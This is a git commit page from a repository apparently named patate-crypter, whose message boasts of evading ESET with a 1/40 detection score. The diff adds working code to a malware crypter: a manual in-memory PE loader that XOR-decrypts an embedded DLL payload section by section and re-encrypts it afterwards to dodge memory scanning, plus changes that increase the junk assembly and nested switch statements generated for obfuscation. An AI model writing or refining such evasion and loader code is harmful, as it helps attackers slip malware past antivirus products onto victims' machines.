patate/patate-crypter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

only decrypt stuff when using them, 1/40 detect

Browse Source 
fuck ESET, i got you ! https://kleenscan.com/scan_result/a58d3cad2abdfbb7a93b77deefd8dff4eed3a88af6e70d405768ed9c87dc8027
This commit is contained in:
ALittlePatate
2023-09-21 11:05:13 +02:00
parent ae7910a287
commit 49a4b62f0f
4 changed files with 25 additions and 19 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
DllExecutor.vcxproj
View File

@@ -109,6 +109,7 @@
<Optimization>Disabled</Optimization> <Optimization>Disabled</Optimization>
<WholeProgramOptimization>false</WholeProgramOptimization> <WholeProgramOptimization>false</WholeProgramOptimization>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks> <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Windows</SubSystem> <SubSystem>Windows</SubSystem>

4
gui.py
View File

@@ -85,7 +85,7 @@ class Ui_mainWindow(object):
self.spinBox = QtWidgets.QSpinBox(self.centralwidget) self.spinBox = QtWidgets.QSpinBox(self.centralwidget)
self.spinBox.setGeometry(QtCore.QRect(155, 118, 42, 22)) self.spinBox.setGeometry(QtCore.QRect(155, 118, 42, 22))
self.spinBox.setObjectName("spinBox") self.spinBox.setObjectName("spinBox")
self.spinBox.setValue(8) self.spinBox.setValue(2)
self.spinBox.setMinimum(1) self.spinBox.setMinimum(1)
self.label_3 = QtWidgets.QLabel(self.centralwidget) self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(120, 122, 47, 13)) self.label_3.setGeometry(QtCore.QRect(120, 122, 47, 13))
@@ -96,7 +96,7 @@ class Ui_mainWindow(object):
self.spinBox_2 = QtWidgets.QSpinBox(self.centralwidget) self.spinBox_2 = QtWidgets.QSpinBox(self.centralwidget)
self.spinBox_2.setGeometry(QtCore.QRect(155, 138, 42, 22)) self.spinBox_2.setGeometry(QtCore.QRect(155, 138, 42, 22))
self.spinBox_2.setObjectName("spinBox_2") self.spinBox_2.setObjectName("spinBox_2")
self.spinBox_2.setValue(3) self.spinBox_2.setValue(8)
self.spinBox_2.setMinimum(1) self.spinBox_2.setMinimum(1)
self.checkBox_3 = QtWidgets.QCheckBox(self.centralwidget) self.checkBox_3 = QtWidgets.QCheckBox(self.centralwidget)
self.checkBox_3.setGeometry(QtCore.QRect(20, 140, 91, 16)) self.checkBox_3.setGeometry(QtCore.QRect(20, 140, 91, 16))

31
main.cpp
View File

@@ -30,6 +30,18 @@ Works with :
- Doesn't copy headers - Doesn't copy headers
*/ */
void decrypt(const char* key, int offset = 0, int limit = -1) {
//START
size_t key_size = strlen(key);
const int bufferSize = sizeof(sample) / sizeof(sample[0]);
if (limit == -1) limit = bufferSize;
if (key_size == 0) return;
for (int i = offset; i < limit ; i++) {
sample[i] ^= key[i%key_size];
}
//END
}
// This function will load a DLL from a buffer into the current process. // This function will load a DLL from a buffer into the current process.
// The DLL is expected to be in the PE format. // The DLL is expected to be in the PE format.
// //
@@ -48,6 +60,8 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
return NULL; return NULL;
} }
decrypt(KEY, 0, 1024); // decrypt only the header
// Get a pointer to the DOS header. // Get a pointer to the DOS header.
const IMAGE_DOS_HEADER* dos_header = static_cast<const IMAGE_DOS_HEADER*>(dll_buffer); const IMAGE_DOS_HEADER* dos_header = static_cast<const IMAGE_DOS_HEADER*>(dll_buffer);
@@ -79,8 +93,10 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
// Copy the section data to the allocated memory. // Copy the section data to the allocated memory.
for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) { for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
const IMAGE_SECTION_HEADER* section_header = section_headers + i; const IMAGE_SECTION_HEADER* section_header = section_headers + i;
decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //decrypt section
memcpy(static_cast<char*>(image_base) + section_header->VirtualAddress, static_cast<const char*>(dll_buffer) + section_header->PointerToRawData, section_header->SizeOfRawData); memcpy(static_cast<char*>(image_base) + section_header->VirtualAddress, static_cast<const char*>(dll_buffer) + section_header->PointerToRawData, section_header->SizeOfRawData);
} decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //encrypt back section
}
DEBUG_PRINTF("[+] Wrote section data\n"); DEBUG_PRINTF("[+] Wrote section data\n");
@@ -217,16 +233,6 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
//END //END
} }
void decrypt(const char* key) {
//START
size_t key_size = strlen(key);
if (key_size == 0) return;
for (int i = 0; i < sizeof(sample) / sizeof(sample[0]); i++) {
sample[i] ^= key[i%key_size];
}
//END
}
void allo() { void allo() {
//START //START
AllocConsole(); AllocConsole();
@@ -251,8 +257,7 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm
// Load the DLL from a buffer in memory // Load the DLL from a buffer in memory
const int bufferSize = sizeof(sample) / sizeof(sample[0]); const int bufferSize = sizeof(sample) / sizeof(sample[0]);
decrypt(KEY);
HMODULE dll = RunPE(sample, bufferSize, NEW_ADDRESS); HMODULE dll = RunPE(sample, bufferSize, NEW_ADDRESS);
if (dll == NULL) { if (dll == NULL) {
DEBUG_PRINTF("[-] Failed to load DLL\n"); DEBUG_PRINTF("[-] Failed to load DLL\n");

8
obfuscation.py
View File

@@ -81,7 +81,7 @@ def GetAsmBlock(branch1, branch2, var, end, sub) :
"""+branch1+""":""" """+branch1+""":"""
if GetRandomRange(0, 4) > 2 : if GetRandomRange(0, 4) > 1 :
branch1 = GetRandomString(20) branch1 = GetRandomString(20)
branch2_ = GetRandomString(20) branch2_ = GetRandomString(20)
asm_block += GetAsmBlock(branch1, branch2_, var, end, sub) asm_block += GetAsmBlock(branch1, branch2_, var, end, sub)
@@ -102,7 +102,7 @@ def GetRandomAssemblyBlock() :
r = """const char* """+var+""" = \""""+GetRandomString(5)+"""\";\n__asm {""" r = """const char* """+var+""" = \""""+GetRandomString(5)+"""\";\n__asm {"""
for i in range(GetRandomRange(0, 15)) : for i in range(GetRandomRange(0, 30)) :
branch1 = GetRandomString(20) branch1 = GetRandomString(20)
branch2 = GetRandomString(20) branch2 = GetRandomString(20)
end = GetRandomString(20) end = GetRandomString(20)
@@ -115,11 +115,11 @@ def generate_switch_statement(variable_name, exit_value, depth=0):
indent = " " * depth indent = " " * depth
switch_code = f"{indent}switch ({variable_name}) {{\n" switch_code = f"{indent}switch ({variable_name}) {{\n"
num_cases = GetRandomRange(1, 4) num_cases = GetRandomRange(2, 5)
for _ in range(num_cases): for _ in range(num_cases):
case_value = GetRandomRange(1, 10**6) case_value = GetRandomRange(1, 10**6)
switch_code += f"{indent} case {case_value}:\n" switch_code += f"{indent} case {case_value}:\n"
if depth < 2 and GetRandomRange(0, 4) > 2 : if depth < 2 and GetRandomRange(0, 4) > 1 :
switch_code += generate_switch_statement(variable_name, exit_value, depth + 1) switch_code += generate_switch_statement(variable_name, exit_value, depth + 1)
else: else:
switch_code += f"{indent} {{\n" switch_code += f"{indent} {{\n"